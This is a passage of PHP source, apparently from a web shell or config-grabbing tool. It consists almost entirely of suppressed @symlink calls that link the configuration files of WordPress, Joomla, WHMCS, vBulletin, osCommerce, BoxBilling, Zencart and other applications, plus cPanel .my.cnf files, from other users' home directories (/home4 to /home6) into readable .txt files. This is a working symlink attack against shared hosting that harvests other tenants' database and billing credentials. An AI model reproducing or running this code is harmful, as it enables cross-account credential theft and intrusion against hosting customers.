  1674. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1675. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1676. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1677. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1678. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1679. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1680. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1681. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1682. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1683. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1684. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1685. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1686. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1687. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1688. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1689. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1690. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1691. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1692. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1693. @symlink('/home4/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1694. @symlink('/home4/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1695.  
  1696. //home5
  1697.  
  1698. @symlink('/home5/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1699. @symlink('/home5/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1700. @symlink('/home5/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1701. @symlink('/home5/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1702. @symlink('/home5/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1703. @symlink('/home5/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1704. @symlink('/home5/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1705. @symlink('/home5/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1706. @symlink('/home5/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1707. @symlink('/home5/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1708. @symlink('/home5/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1709. @symlink('/home5/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1710. @symlink('/home5/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1711. @symlink('/home5/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1712. @symlink('/home5/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1713. @symlink('/home5/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1714. @symlink('/home5/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1715. @symlink('/home5/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1716. @symlink('/home5/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1717. @symlink('/home5/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1718. @symlink('/home5/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1719. @symlink('/home5/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1720. @symlink('/home5/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1721. @symlink('/home5/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1722. @symlink('/home5/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1723. @symlink('/home5/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1724. @symlink('/home5/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1725. @symlink('/home5/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1726. @symlink('/home5/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1727. @symlink('/home5/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1728. @symlink('/home5/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1729. @symlink('/home5/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1730. @symlink('/home5/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1731. @symlink('/home5/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1732. @symlink('/home5/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1733. @symlink('/home5/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1734. @symlink('/home5/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1735. @symlink('/home5/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1736. @symlink('/home5/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1737. @symlink('/home5/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1738. @symlink('/home5/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1739. @symlink('/home5/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1740. @symlink('/home5/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1741. @symlink('/home5/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1742. @symlink('/home5/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1743. @symlink('/home5/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1744. @symlink('/home5/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home5/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home5/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1749. @symlink('/home5/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1750. @symlink('/home5/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1751. @symlink('/home5/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1752. @symlink('/home5/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1753. @symlink('/home5/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1754. @symlink('/home5/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1755. @symlink('/home5/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1756. @symlink('/home5/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1757. @symlink('/home5/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1758. @symlink('/home5/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1759. @symlink('/home5/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1760. @symlink('/home5/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1761. @symlink('/home5/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1762. @symlink('/home5/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1763. @symlink('/home5/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1764. @symlink('/home5/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1765. @symlink('/home5/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1766. @symlink('/home5/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1767. @symlink('/home5/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1768. @symlink('/home5/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1769. @symlink('/home5/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1770. @symlink('/home5/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1771. @symlink('/home5/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1772. @symlink('/home5/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1773. @symlink('/home5/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1774. @symlink('/home5/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1775. @symlink('/home5/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1776. @symlink('/home5/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1777. @symlink('/home5/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1778. @symlink('/home5/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1779. @symlink('/home5/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1780. @symlink('/home5/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1781. @symlink('/home5/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1782. @symlink('/home5/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1783. @symlink('/home5/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1784. @symlink('/home5/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1785. @symlink('/home5/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1786. @symlink('/home5/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1787. @symlink('/home5/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1788. @symlink('/home5/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1789. @symlink('/home5/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1790. @symlink('/home5/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1791. @symlink('/home5/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1792. @symlink('/home5/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1793. @symlink('/home5/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1794. @symlink('/home5/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1795. @symlink('/home5/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1796. @symlink('/home5/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1797. @symlink('/home5/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1798. @symlink('/home5/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1799. @symlink('/home5/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1800. @symlink('/home5/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1801. @symlink('/home5/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1802. @symlink('/home5/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1803. @symlink('/home5/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1804. @symlink('/home5/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1805. @symlink('/home5/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1806. @symlink('/home5/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1807. @symlink('/home5/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1808. @symlink('/home5/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1809. @symlink('/home5/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1810. @symlink('/home5/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1811. @symlink('/home5/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1812. @symlink('/home5/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1813. @symlink('/home5/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1814. @symlink('/home5/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1815. @symlink('/home5/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1816. @symlink('/home5/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1817. @symlink('/home5/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1818. @symlink('/home5/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1819. @symlink('/home5/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1820. @symlink('/home5/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1821. @symlink('/home5/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1822. @symlink('/home5/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1823. @symlink('/home5/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1824. @symlink('/home5/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1825. @symlink('/home5/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1826. @symlink('/home5/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1827. @symlink('/home5/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1828. @symlink('/home5/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1829. @symlink('/home5/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1830. @symlink('/home5/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1831. @symlink('/home5/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1832. @symlink('/home5/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1833. @symlink('/home5/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1834. @symlink('/home5/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1835. @symlink('/home5/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1836. @symlink('/home5/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1837. @symlink('/home5/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1838. @symlink('/home5/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1839. @symlink('/home5/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1840. @symlink('/home5/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1841. @symlink('/home5/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1842. @symlink('/home5/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1843. @symlink('/home5/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1844. @symlink('/home5/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1845. @symlink('/home5/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1846. @symlink('/home5/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1847. @symlink('/home5/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1848. @symlink('/home5/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1849. @symlink('/home5/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1850. @symlink('/home5/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1851. @symlink('/home5/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1852. @symlink('/home5/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1853. @symlink('/home5/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1854. @symlink('/home5/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1855. @symlink('/home5/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1856. @symlink('/home5/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1857. @symlink('/home5/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1858. @symlink('/home5/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1859. @symlink('/home5/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1860. @symlink('/home5/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1861. @symlink('/home5/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1862. @symlink('/home5/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1863. @symlink('/home5/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1864. @symlink('/home5/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1865. @symlink('/home5/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1866. @symlink('/home5/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1867. @symlink('/home5/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1868. @symlink('/home5/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1869. @symlink('/home5/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1870. @symlink('/home5/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1871. @symlink('/home5/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1872. @symlink('/home5/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1873. @symlink('/home5/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1874. @symlink('/home5/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1875. @symlink('/home5/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1876. @symlink('/home5/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1877. @symlink('/home5/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1878. @symlink('/home5/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1879. @symlink('/home5/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1880.  
  1881. //home6
  1882.  
  1883. @symlink('/home6/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1884. @symlink('/home6/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1885. @symlink('/home6/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1886. @symlink('/home6/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1887. @symlink('/home6/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1888. @symlink('/home6/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1889. @symlink('/home6/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1890. @symlink('/home6/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1891. @symlink('/home6/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1892. @symlink('/home6/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1893. @symlink('/home6/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1894. @symlink('/home6/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1895. @symlink('/home6/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1896. @symlink('/home6/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1897. @symlink('/home6/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1898. @symlink('/home6/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1899. @symlink('/home6/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1900. @symlink('/home6/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1901. @symlink('/home6/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1902. @symlink('/home6/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1903. @symlink('/home6/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1904. @symlink('/home6/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1905. @symlink('/home6/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1906. @symlink('/home6/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1907. @symlink('/home6/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1908. @symlink('/home6/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1909. @symlink('/home6/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1910. @symlink('/home6/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1911. @symlink('/home6/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1912. @symlink('/home6/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1913. @symlink('/home6/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1914. @symlink('/home6/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1915. @symlink('/home6/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1916. @symlink('/home6/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1917. @symlink('/home6/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1918. @symlink('/home6/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1919. @symlink('/home6/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1920. @symlink('/home6/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1921. @symlink('/home6/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1922. @symlink('/home6/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1923. @symlink('/home6/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1924. @symlink('/home6/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1925. @symlink('/home6/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1926. @symlink('/home6/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1927. @symlink('/home6/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1928. @symlink('/home6/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1929. @symlink('/home6/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1930. @symlink('/home6/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1931. @symlink('/home6/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1932. @symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1933. @symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1934. @symlink('/home6/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1935. @symlink('/home6/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1936. @symlink('/home6/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1937. @symlink('/home6/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1938. @symlink('/home6/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1939. @symlink('/home6/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1940. @symlink('/home6/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1941. @symlink('/home6/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1942. @symlink('/home6/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1943. @symlink('/home6/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1944. @symlink('/home6/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1945. @symlink('/home6/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1946. @symlink('/home6/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1947. @symlink('/home6/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1948. @symlink('/home6/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1949. @symlink('/home6/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1950. @symlink('/home6/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1951. @symlink('/home6/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1952. @symlink('/home6/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1953. @symlink('/home6/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1954. @symlink('/home6/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1955. @symlink('/home6/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1956. @symlink('/home6/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1957. @symlink('/home6/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1958. @symlink('/home6/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1959. @symlink('/home6/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1960. @symlink('/home6/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1961. @symlink('/home6/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1962. @symlink('/home6/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1963. @symlink('/home6/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1964. @symlink('/home6/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1965. @symlink('/home6/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1966. @symlink('/home6/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1967. @symlink('/home6/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1968. @symlink('/home6/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1969. @symlink('/home6/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1970. @symlink('/home6/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1971. @symlink('/home6/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1972. @symlink('/home6/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1973. @symlink('/home6/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1974. @symlink('/home6/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1975. @symlink('/home6/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1976. @symlink('/home6/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1977. @symlink('/home6/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1978. @symlink('/home6/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1979. @symlink('/home6/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1980. @symlink('/home6/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1981. @symlink('/home6/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
